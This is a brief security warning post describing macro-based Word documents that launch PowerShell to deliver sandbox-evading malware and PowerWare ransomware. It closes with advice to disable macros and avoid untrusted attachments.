Recently we became aware of multiple malware using PowerShell scripts combined with other traditional applications to infect victim’s PC. Earlier this month security researchers at Palo Alto Networks published analysis of ransomware strain. Malware is distributed as MS Word attachment via e-mail. The malicious document contains macros, which run PowerShell script.
The PowerShell script analyzes system environment and is trying to detect whether it is on a virtual machine or in the sandbox. It would appear as though this malware is attempting to actively avoid healthcare and education machines, as well as target point of sale instances and machines that conduct financial transactions. Similar techniques were witnessed in a malware family named ‘Ursnif’ in 2015.
A new strain of ransomware was spotted by researchers from Carbon Black. As in previous case, PowerShell script is delivered via a macro-enabled Microsoft Word document. The Word document then uses macros to execute cmd.exe, which in turn calls PowerShell with options that will download and run the malicious PowerWare code.
The victims are demanded to pay $500 ransom to regain access to the PC. After two weeks, if unpaid, the amount of money raises up to $1000.
We would like to warn users not to open any documents received from untrusted sources, configure your Microsoft Office security settings to disable macros and keep your software up-to-date.